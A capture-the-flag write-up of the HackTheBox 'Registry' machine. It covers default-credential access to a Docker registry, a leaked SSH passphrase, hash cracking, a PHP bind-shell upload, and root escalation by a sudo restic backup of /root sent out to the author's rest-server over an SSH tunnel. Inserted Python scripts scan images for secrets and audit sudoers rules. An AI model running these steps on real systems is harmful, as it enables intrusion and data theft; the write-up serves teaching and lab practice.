This is a write-up on how I solved Registry from HackTheBox.

Hack the Box is an online platform to test and advance your skills in penetration testing and cybersecurity.

About this box:

Actually, Registry was my first Hard level box.

Recon:

nmap: network exploration tool and security/port scanner
-sV: version detection
-sC: script scan using the default set of scripts
-oA: write output in all formats

Only three ports are open: 22, 80 and 443. The Nmap scan also reveals a virtual host in the SSL certificate subject: docker.registry.htb

Let's start with port 80: we get the default Nginx welcome page.

The same on port 443: the default Nginx page.

Okay, let’s see what we got on docker.registry.htb

We can access it by adding it to the /etc/hosts file: open the file with your favorite text editor and add the virtual host.

sudo vim /etc/hosts

We get a blank page on docker.registry.htb

Spoiler alert

A registry is a storage and content delivery system, holding named Docker images, available in different tagged versions.

Enumeration

We can use Gobuster for directory enumeration.

$ gobuster dir -u http://10.10.10.159/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o ip-enum -t 20
$ gobuster dir -u http://docker.registry.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o vhost-enum -t 20

So far, so good: we have a bolt directory on 10.10.10.159 and a v2 directory on docker.registry.htb. Let's check them.

Browse to http://10.10.10.159/bolt, which shows the default page of Bolt CMS.

Since this is just the default Bolt page, we can leave Gobuster running directory enumeration against it in the background and move on to docker.registry.htb

Oh, authorization is required on docker.registry.htb

docker.registry.htb/v2

If we try weak credentials such as admin:admin, they work.

admin:admin

Okay, we are in.

A registry is a storage and content delivery system, holding named Docker images. — https://docs.docker.com/registry/introduction/

Visit docker.registry.htb/v2/_catalog to list the image repositories hosted in this registry.

The registry holds an image called bolt-image. There is very likely something useful inside it.
The next step is to pull the image.

We need to install Docker and change its configuration, because Docker will not accept the registry's SSL certificate.

Docker installation
$ curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -
$ echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' | sudo tee /etc/apt/sources.list.d/docker.list
$ sudo apt-get update
$ sudo apt-get install docker-ce

We have Docker; the next step is to make Docker accept the insecure connection. Add the registry to /etc/docker/daemon.json (plain ASCII quotes, not typographic ones, and restart the Docker daemon afterwards):

{
  "insecure-registries": ["docker.registry.htb:443"]
}

sudo docker login docker.registry.htb:443

Login succeeded.

The next step is to pull the latest docker image.

sudo docker pull docker.registry.htb:443/bolt-image:latest

Now run the docker image to access the content inside of the container.

sudo docker run -it docker.registry.htb:443/bolt-image:latest

Get the user

After some digging, we have the passphrase in /etc/profile.d/01-ssh.sh

GkOcz221Ftb3ugog
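The passphrase was sitting in a file baked into the image layers. As an added defender-side example (not code from the write-up), the script below does the check an image owner should run before pushing: it walks a `docker save` archive, treats every member that is itself a tarball as a layer, and flags private keys and password/passphrase assignments. The image archive, its layer layout and the secret values are constructed in memory for the demo.

```python
import io
import re
import tarfile

# Content that should never be baked into an image layer (constructed pattern list).
SECRET_PATTERNS = {
    "private-key": re.compile(rb"-----BEGIN (?:RSA |OPENSSH |EC )?PRIVATE KEY-----"),
    "password-assignment": re.compile(rb"(?i)\bpass(?:word|phrase)?\s*=\s*\S+"),
}

def scan_layer(layer_bytes):
    """Return [(path, finding)] for small regular files inside one layer tarball."""
    hits = []
    with tarfile.open(fileobj=io.BytesIO(layer_bytes), mode="r:*") as layer:
        for member in layer.getmembers():
            if not member.isfile() or member.size > 1_000_000:
                continue  # skip large blobs; leaked keys and scripts are small text
            data = layer.extractfile(member).read()
            hits += [(member.name, name) for name, pat in SECRET_PATTERNS.items() if pat.search(data)]
    return hits

def scan_image(image_tar_bytes):
    """Walk a `docker save` archive; any member that is itself a tar is a layer."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(image_tar_bytes), mode="r:*") as image:
        for member in image.getmembers():
            if not member.isfile():
                continue
            try:
                findings += scan_layer(image.extractfile(member).read())
            except tarfile.ReadError:
                pass  # manifest.json and config blobs are not layers
    return findings

def _tar_bytes(files):
    """Build an in-memory tar from {path: bytes} (constructed test data)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for path, content in files.items():
            info = tarfile.TarInfo(path)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()

def build_sample_image():
    """Constructed image: a clean layer plus one leaking an SSH key and its passphrase."""
    leaky = {"etc/profile.d/01-ssh.sh": b"#!/bin/sh\nPASSPHRASE=NotTheRealOne123\n",
             "root/.ssh/id_rsa": b"-----BEGIN RSA PRIVATE KEY-----\nMIIE...\n"}
    return _tar_bytes({"manifest.json": b'[{"Layers":["a/layer.tar","b/layer.tar"]}]',
                       "a/layer.tar": _tar_bytes({"etc/motd": b"welcome\n"}),
                       "b/layer.tar": _tar_bytes(leaky)})
```

Running `scan_image(build_sample_image())` reports the profile script and the key file from the leaky layer and nothing from the clean one; point it at the bytes of a real `docker save` output to audit an image before it is pushed.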

Let's log in with SSH

$ chmod 600 id_rsa
$ ssh -i id_rsa bolt@10.10.10.159

And we can submit the user hash for 20 points.

Get www-data user

In that directory we also have a backup.php script, owned by the root user. It looks interesting, but we don't have permission to change or execute it.

Every CMS has database files.

After some searching, we can find the database file

/var/www/html/bolt/app/database

Download it with scp and check what we have.

$ scp -i id_rsa bolt@10.10.10.159:/var/www/html/bolt/app/database/bolt.db ./

We can use sqlite3 to extract information from the database file.

Grab the password hash and crack it with John.

$ john --wordlist=/usr/share/wordlists/rockyou.txt bolt_db_hash

And we have the password: admin:strawberry

Remember our scan which we left in the background?

It found the /bolt/bolt directory, which is the login page for Bolt CMS.

We can log in with the credentials admin:strawberry

Get www-data shell

We can't get a reverse shell, because outbound connections are blocked by some kind of firewall. Let's use a bind shell instead.

From research, we know that adding the .php extension to the Bolt configuration file bypasses the PHP upload restriction.

Add the php extension in config.yml and upload the shell again.

It worked: our PHP bind shell is on the server.

Open the URL to trigger the shell and connect to it with nc.

rlwrap is a very handy tool: it lets us use the arrow keys in the shell.

https://linux.die.net/man/1/rlwrap

Okay, we have a www-data shell, and we can run the /usr/bin/restic backup -r test* command with root privileges via sudo.

BUT what can we do with it?

Restic is software that does backups ¯\_(ツ)_/¯
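The sudo rule is the real weakness here: a backup tool plus a wildcard in its repository argument lets the caller choose where root's data is written. As an added defender-side example (not code from the write-up), the script below parses sudoers-style rules and flags wildcards in arguments, unrestricted ALL rules, and data-moving tools whose destination is left to the caller. The sample rules are constructed and only modelled on the kind of entry described above.

```python
import re
import shlex

# Tools whose arguments decide where data is read from or written to; combined with a
# wildcard (or no argument restriction at all) the caller controls those paths as root.
DATA_MOVING_TOOLS = {"restic", "rsync", "tar", "cp", "dd", "scp"}

# user  host=(runas) [TAG:] command args...   (Defaults, aliases and comments are skipped)
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+)$")

def audit_sudoers(text):
    """Return one finding dict per risky rule in sudoers-style text."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "User_Alias", "Cmnd_Alias")):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        for spec in m.group("cmd").split(","):  # several commands may share one rule
            parts = shlex.split(spec.strip())
            if not parts:
                continue
            prog, args = parts[0].rsplit("/", 1)[-1], parts[1:]
            reasons = []
            if prog == "ALL":
                reasons.append("ALL commands")
            if any(ch in a for a in args for ch in "*?["):
                reasons.append("wildcard in arguments")
            if prog in DATA_MOVING_TOOLS and (not args or "wildcard in arguments" in reasons):
                reasons.append(f"{prog} can read/write caller-chosen paths")
            if reasons:
                findings.append({"line": lineno, "user": m.group("user"),
                                 "command": spec.strip(), "reasons": reasons})
    return findings

SAMPLE_SUDOERS = """\
# constructed sample, modelled on the kind of rule described in the write-up
Defaults env_reset
root    ALL=(ALL:ALL) ALL
www-data ALL=(root) NOPASSWD: /usr/bin/restic backup -r test*
bolt    ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
"""
```

`audit_sudoers(SAMPLE_SUDOERS)` flags lines 3, 4 and 6 and leaves the fixed-argument systemctl rule alone; the fix for the restic rule is a fixed repository path (no wildcard) or a dedicated backup user with its own credentials.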

Once you understand a few basic operations, restic is not difficult. First, we need to install restic and the REST server locally.

sudo apt install restic

Then, set up a backup repository.

restic init --repo /tmp/registry_bak

Install rest-server and run it.

Before you try to install it, make sure that your box has a Go version > 1.7
https://github.com/restic/rest-server.gi

rest-server --path /tmp/registry_bak --no-auth --listen 0.0.0.0:8002

Then we need to run the backup command as the www-data user.

Because the target server appears to have some kind of firewall, it is not possible to connect to an external server directly. So in order to back up the data to our local repository, we need SSH remote port forwarding.

ssh -i id_rsa -R 8002:127.0.0.1:8002 bolt@10.10.10.159

Create a file that contains the repository password, and back up the /root directory.

From the root directory we can grab root.txt and the SSH private key.

$ sudo /usr/bin/restic backup -r rest:http://127.0.0.1:8002/ /root/ -p pass

Backup is done!

Now restore the backup and read root.txt

$ restic -r /tmp/registry_bak/ restore latest --target ./registry_restored

Or grab id_rsa and SSH in as the root user.

I hope you enjoyed it; follow me for future posts.

Twitter: https://twitter.com/ls4cfk

https://www.hackthebox.eu/profile/94787
